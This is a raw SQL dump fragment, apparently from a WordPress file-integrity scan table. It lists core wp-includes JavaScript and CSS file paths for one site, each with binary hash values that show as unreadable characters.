B~','Bșo$\'AdLxRU','',0,'?'),('|/ڒ\0[*4x','wp-includes/js/admin-bar.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/admin-bar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rc@p','tbIld\nLbx+ϔj䶪,J\0\r$2','',0,'?'),('MР\0A9Q+','wp-includes/js/admin-bar.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d6}@d&3\r','8dv','wp-includes/js/backbone.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĤNg\\[%I2T','4ڵq_ڇUcxRtQC','',0,'?'),('3h \"I+[ E','wp-includes/js/clipboard.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/clipboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r8ܞRO@','3>0D2!Jw@Ly','',0,'?'),('2bU\0spd0','wp-includes/js/clipboard.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sdjI~iT','Q]qFضUJ\"\r/^0','',0,'?'),('D=K49','wp-includes/js/codemirror/codemirror.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/codemirror.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','23j1(D','Ό,au@sY%K-on\r','',0,'?'),('}eC!*','wp-includes/js/codemirror/codemirror.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' fh;fq','u*Q6Ƅdvdȇ_\0','',0,'?'),(' \nUN~\0m','wp-includes/js/codemirror/csslint.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/csslint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_ϱIl',']ih4Fò\rUWEK(Pd','',0,'?'),('VBǡ\ZB\"\0','wp-includes/js/codemirror/esprima.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/esprima.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_ Sgٛ','];%JslxFqBH\ZU8','',0,'?'),('׵(KB ','wp-includes/js/codemirror/fakejshint.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/fakejshint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5v,ROlx]J\')K','-6$$;}ptO4]2ТR5֡','',0,'?'),('T!ة7l<','wp-includes/js/codemirror/htmlhint-kses.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/htmlhint-kses.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[k[#cLf{','N&V\ZA/R#~բ_J*Ї','',0,'?'),('ƞׅ\ZXX]Y F','wp-includes/js/codemirror/htmlhint.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/htmlhint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2|џGMt P5','\0U[\0M\'mCռ55k`5ё','',0,'?'),('z.[D8R','wp-includes/js/codemirror/jsonlint.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/codemirror/jsonlint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)fyk T+<՟','$D;;0F~pGғFˁ','',0,'?'),('\npGnu:','wp-includes/js/colorpicker.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V g-','Vw%%:3CQ#+g e}','',0,'?'),('0E\00XH','wp-includes/js/colorpicker.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/kFxq','T@\"$: GLB}2PHR ','',0,'?'),('pUya bva;8','wp-includes/js/comment-reply.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/comment-reply.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9(ރ-,qh','W(V4nrkx|/lae\no','',0,'?'),('1X/t60^Ҁ!7','wp-includes/js/comment-reply.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/comment-reply.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I/,\Z~B|\Z','CY3MlO2|T!Q$=@ӧO$TD','',0,'?'),('bY,ϥYr۝;','wp-includes/js/crop/cropper.css','/home/tummmyov/tummyrevolution.com/wp-includes/js/crop/cropper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ky5 ni*M(','ٸTޝOwLy=}gTl','',0,'?'),('\r%%yS`','wp-includes/js/crop/cropper.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/crop/cropper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H.so','py,BG-t=s','',0,'?'),('(|nsARF+','wp-includes/js/crop/marqueeHoriz.gif','/home/tummmyov/tummyrevolution.com/wp-includes/js/crop/marqueeHoriz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̮;Lo\n','|Se|./QYW}(','',0,'?'),('Z\0Y æfg','wp-includes/js/crop/marqueeVert.gif','/home/tummmyov/tummyrevolution.com/wp-includes/js/crop/marqueeVert.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\09R',' Kcg$e2\\p$1z`CkJ','',0,'?'),('r\\jA$','wp-includes/js/customize-base.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-base.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%Pe.,*䤊y','n>)wîɮ>4nw','',0,'?'),('V\nU`_58','wp-includes/js/customize-base.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-base.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L妽uW?t','LIIM c$kƁd&@G','',0,'?'),('V}Pm/|I*','wp-includes/js/customize-loader.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`6!҃z','G?~D,(F]IbNEpcv:z','',0,'?'),('bҌ &?{','wp-includes/js/customize-loader.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V,yV~=','r\'b\Zvi|~4K]^5','',0,'?'),('xЙ)DC<','wp-includes/js/customize-models.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'~G~Ԟ','h3XVxpTOS‘Sfb\rE捵','',0,'?'),('\nNNMۑ4;p4','wp-includes/js/customize-models.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eTo\n:ם/0','0Om .>j>?','wp-includes/js/customize-preview-widgets.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-preview-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y}xc&','(]PUP\'L2n\Z\n','',0,'?'),('9r Mԧ','wp-includes/js/customize-preview-widgets.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-preview-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b^Zi\"\'X}kf','oCMdž=M0ʫ','',0,'?'),('42)A.;4','wp-includes/js/customize-preview.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Q !@٧T\r',' Z\\L\'b%i$\Z\nF~','',0,'?'),('>ql+m\05Ħ\"^','wp-includes/js/customize-preview.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y $F-=Xh','P#yJI+tPǰ\"k','',0,'?'),(' UNEAgt','wp-includes/js/customize-selective-refresh.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-selective-refresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uP岉0x\Z','q˖jZC~','/Nx~jwPYWrO^ZqQ\Z$','',0,'?'),('QY1TlVr<','wp-includes/js/customize-views.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r<`D','b2M!o;-veq\\f]l:','',0,'?'),('Y^~5~pG-','wp-includes/js/customize-views.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/customize-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hӷ-\\Me','bL-9wloy$+Y\ZޘN','',0,'?'),('2Jy*m]W','wp-includes/js/dist/a11y.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/a11y.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!BPR','iZ\\x c\'Uh>ߢV9… ','',0,'?'),('|0O+]lU','wp-includes/js/dist/a11y.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/a11y.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5়_F\"c%','bV9!]9! GH','',0,'?'),(',]\'N%ݑUeT)','wp-includes/js/dist/annotations.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/annotations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nm4>JIϪ','PFn3qZ`[ĔM(2Y\r\"','',0,'?'),('Y(Kg\0_','wp-includes/js/dist/annotations.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/annotations.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c<6^8b.r','UC~2 $*]efb\"','',0,'?'),('EȖqȊ?2H','wp-includes/js/dist/api-fetch.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lex','JIʧuLM+t','wp-includes/js/dist/autop.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/autop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\noKEr','IҪ{e(I0\0[Ru','',0,'?'),('k4c5<\"','wp-includes/js/dist/autop.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/autop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','||nъP','T\'O8o \rw Hp_s|!','',0,'?'),('Ϛ\"jy^','wp-includes/js/dist/blob.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/blob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xڨo',')*>ဌDTU 1F$v\"','',0,'?'),('ä]0`AS:D','wp-includes/js/dist/blob.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/blob.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uAϽͨ\'','Ҍ\n|]&} [ o8#u','',0,'?'),('|vP0fhT','wp-includes/js/dist/block-directory.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-directory.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`;po','E?x~J]J6\04(bdSj6\"','',0,'?'),('(Y\'^kz!q','wp-includes/js/dist/block-directory.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-directory.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȧlp,12DAW\"','A؄T\0jT9 ;v9̀3U{','',0,'?'),(';!1>Y xQ','wp-includes/js/dist/block-editor.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#Ngժ','![͂a; \ZxyH\Ze䎶Z`','',0,'?'),('v6Z\'OIL\"ݕM','wp-includes/js/dist/block-editor.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z]a55QP\\OT','Fsysb9t#fHe','',0,'?'),('ĩ}x(T','wp-includes/js/dist/block-library.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-0\0N%)|p9','%%r9``ǀ5+\r1}scy','',0,'?'),('N3M\nS0j','wp-includes/js/dist/block-library.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƀisd-G','[CpdZ2@V%k=c؟١#','',0,'?'),('CǴk q{.L','wp-includes/js/dist/block-serialization-default-parser.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-serialization-default-parser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#ddퟒ','Wef>-ܩ\0ڻY\r?R','',0,'?'),('S8MC>','wp-includes/js/dist/block-serialization-default-parser.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/block-serialization-default-parser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N틺=&F','J7_8 @4^-7%kw','',0,'?'),('\Z ֧\\\Zhi','wp-includes/js/dist/blocks.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZQ&F6:','I*\"0 sQ 6+\\','',0,'?'),('7:b\r,ja','wp-includes/js/dist/blocks.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s5ka_T','jAީx\"zn 9q','',0,'?'),('\'\rrr\'2Du','wp-includes/js/dist/commands.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/commands.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mz\nNW07A>','t S®Rs\rD$1%Y ','wp-includes/js/dist/components.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/components.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%ܝ0.!5Fx8:','5_:Aҷϳ1WM#id~','',0,'?'),('وTĖhx~Dt>l','wp-includes/js/dist/compose.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/compose.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xaB){̄œ:C','Nշ(t3Rf\'HXW@9|','',0,'?'),('5قaܨϘ #bu','wp-includes/js/dist/compose.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/compose.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tB$vQ','5!hΎqMbK^̑;ꆕ','',0,'?'),(' }bաN','wp-includes/js/dist/core-commands.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/core-commands.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+W`\\uhaa\Z.','Qz9kw3=PO2','',0,'?'),('\0b21?:','wp-includes/js/dist/core-commands.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/core-commands.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UPuXT Pa','Tycgz>|2؇bCƳzv- g','',0,'?'),('IԬlv0O','wp-includes/js/dist/core-data.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/core-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qڛ-{7:p\Z','$Sjȹ?=gP`\0*rh','',0,'?'),('x2_.~$)','wp-includes/js/dist/core-data.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/core-data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b)sj!i','pSBv(maG-ؾ','',0,'?'),('D\'%S6>{','wp-includes/js/dist/customize-widgets.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rt󨔅vN|g','<mGcل.(Gcq_','',0,'?'),('yY)hNÁ','wp-includes/js/dist/customize-widgets.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oOf\rgW<\\B$',',sy%6RPhjb\Zd‰̔GR?}O{','',0,'?'),('\n /Y','wp-includes/js/dist/data-controls.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/data-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/+Mey','tpJd4öʞd(ℐi','',0,'?'),('!>лӊ^[U}','wp-includes/js/dist/data-controls.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/data-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[lY_ H/','_yKJ\n!bXc~','',0,'?'),('g ֿm ㋣I','wp-includes/js/dist/data.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@\nO}I=','m(J%+y\0 B(o\rj?c','',0,'?'),('\"NMkVO','wp-includes/js/dist/data.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a59*K','0!0J|5 -(B lיGķ','',0,'?'),('Glݠ_','wp-includes/js/dist/date.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oUk^ڢ n','$$}U.(Ŝ ;z','',0,'?'),('\"J2\rߤ-H&','wp-includes/js/dist/date.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/date.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Խ\0dXZ','抁\"ܛC2PKra;Ty]̓q','',0,'?'),('Vk8`+','wp-includes/js/dist/development/react-refresh-entry.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/development/react-refresh-entry.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J܇{{AvƸ','Է,Mw}_9\'%\0yb','',0,'?'),('MġwwKN','wp-includes/js/dist/development/react-refresh-entry.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/development/react-refresh-entry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J܇{{AvƸ','Է,Mw}_9\'%\0yb','',0,'?'),('IN)p:<','wp-includes/js/dist/development/react-refresh-runtime.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/development/react-refresh-runtime.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wdvG_ [Osa','vEa0̡@zV_R\n6n@','',0,'?'),('ȍٶtTl~','wp-includes/js/dist/development/react-refresh-runtime.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/development/react-refresh-runtime.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wdvG_ [Osa','vEa0̡@zV_R\n6n@','',0,'?'),('k\'\n+&=n`3','wp-includes/js/dist/dom-ready.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jDulW`\"IS6','Jϗ./8;1nmv:\'I','',0,'?'),('ҡK%^','wp-includes/js/dist/dom-ready.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/dom-ready.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' VNp܂ R','u28>&$V㔇̞E_vz\r','',0,'?'),('B\"^I\nhƜ','wp-includes/js/dist/dom.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M\n!AS5','9u*(A_s~suѿ)Qo','',0,'?'),('{xZc\"hb?','wp-includes/js/dist/dom.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1f\ZϕЇ4J9','n 7*Oc9~ki+$QF\r','',0,'?'),('` ƢXv{;','wp-includes/js/dist/edit-post.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Pl/!\r2','tZ2]d=\Z霩mFum-\"u1w\r','',0,'?'),('qR+q\Z2','wp-includes/js/dist/edit-post.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >qHp','>B%AK;,tvl0XpRi','',0,'?'),('_WS ޲$','wp-includes/js/dist/edit-site.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-site.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','( TBjR','Pz`%ɅYB[#ևK','',0,'?'),('st]H\n','wp-includes/js/dist/edit-site.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-site.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X4 |`ߠBwU','\ZF[NaF5z2kBS4ߛ','',0,'?'),('5&$5Q5N','wp-includes/js/dist/edit-widgets.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F쫉<.Ā','.Wl^7\ZWCyj\n','',0,'?'),('(Կɶ۾趮','wp-includes/js/dist/edit-widgets.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/edit-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C$~X1:\"Δ','([+:ii9ybCO^S4Q=m','',0,'?'),('8R6>G\"','wp-includes/js/dist/element.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/element.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q9(Iڍ8]V\Z','i3G& \nhpw6rRG(ķ','',0,'?'),('E5;tR$L','wp-includes/js/dist/element.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/element.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rQ6t-ǰz','fQzW-Xoz)CTT>s\n','',0,'?'),('Y/ޑ \Z','wp-includes/js/dist/escape-html.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/escape-html.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vt9d','S+fwc@~—ߤ~ [ ','',0,'?'),(' Ӱꅑc','wp-includes/js/dist/escape-html.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/escape-html.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'h ԛ[+;','šooeDg\0L\'W&(S˙@Zv˃z','',0,'?'),('\'!\Z!pH','wp-includes/js/dist/interactivity.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/interactivity.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9uj19&#4 ','&HjFj6\rnX\Z8 N//&W','',0,'?'),('gU)\rR(','wp-includes/js/dist/is-shallow-equal.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/is-shallow-equal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']:sY\'wΔQO','B<.\02DI#߂q~kpqM^y3=','',0,'?'),('r=cMz','wp-includes/js/dist/is-shallow-equal.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/is-shallow-equal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\01잓K1ܞM','f]ZU>i.i[]c','',0,'?'),('!ہIǵ`8t','wp-includes/js/dist/keyboard-shortcuts.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/keyboard-shortcuts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WC%zD\"<','B:Gs𥝔n_3-O.\Zڵ\r+','',0,'?'),('=噄\nAK(l','wp-includes/js/dist/keyboard-shortcuts.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/keyboard-shortcuts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\"KeB\r','|p|s\\ъi%D','',0,'?'),(']ǿ|IC','wp-includes/js/dist/keycodes.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/keycodes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','><Gz','\Z)zl9_@yMID喇\'','',0,'?'),('*V.XZ_C[AԀC3','wp-includes/js/dist/keycodes.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/keycodes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#i--_v','!_[3dNKY_`\Z','',0,'?'),('(Օ)(pwBl','wp-includes/js/dist/list-reusable-blocks.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/list-reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϕ4xݪy(','>S\\F|\Z9Чi6+oiPD','',0,'?'),('! xx+![(','wp-includes/js/dist/list-reusable-blocks.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/list-reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ƒr\\27Ǜ','uL7G\'ĺoxhuGGDO;','',0,'?'),('JB&9:VF[','wp-includes/js/dist/media-utils.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/media-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\01y`ԗ','8Pg*pieg,]n{','',0,'?'),('ܟҿB∶','wp-includes/js/dist/media-utils.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nѩ/VJ','=3\n3{E^\r!tVL73','',0,'?'),(' Kȁ;$z','wp-includes/js/dist/notices.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+^v','( T@޾O^@#=ItD>E','',0,'?'),('lZq#eS%s7Y','wp-includes/js/dist/notices.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/notices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','##:!;[','K\nFs qX34e zmKʄ','',0,'?'),(' ZuiigԄ','wp-includes/js/dist/nux.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/nux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$9KfytW','!;ŖBԸy;mTfy~q|gl@Q','',0,'?'),('Asvg4U','wp-includes/js/dist/nux.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/nux.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\<&Bqօ)-','sHɖm\\$fCn Ds,6LN\\','',0,'?'),('&\'`wƚ','wp-includes/js/dist/patterns.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/patterns.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')*U*G[f','>ueo\"OW1OJ#mD','',0,'?'),('\Zt0Nԡ1/','wp-includes/js/dist/patterns.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/patterns.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n2|~s Ȉnvl','}nt:VcN/\r&ۼ=H z8','',0,'?'),('ƬSXZ3','wp-includes/js/dist/plugins.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-FR/Dj_','Tue0&5h\"d{?Ck','',0,'?'),('Hr #w/:4','wp-includes/js/dist/plugins.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ |χ',':. w߭#8o:V]','',0,'?'),(')&`&X ','wp-includes/js/dist/preferences-persistence.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/preferences-persistence.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\r&Fj冋','ö#w/7\0tˏͿ\r<Hs2f','',0,'?'),('l0:Da/L7a;','wp-includes/js/dist/preferences-persistence.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/preferences-persistence.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}@o~}-ö','o55}>\rҲ\r&pp8','',0,'?'),('`ooZW8`','wp-includes/js/dist/preferences.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/preferences.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' nT*:HK','U98lٓ','f;F[9lMȡ+\ndT','',0,'?'),('W:]','wp-includes/js/dist/primitives.js','/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/primitives.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɖHT#иH>׸','ߚ 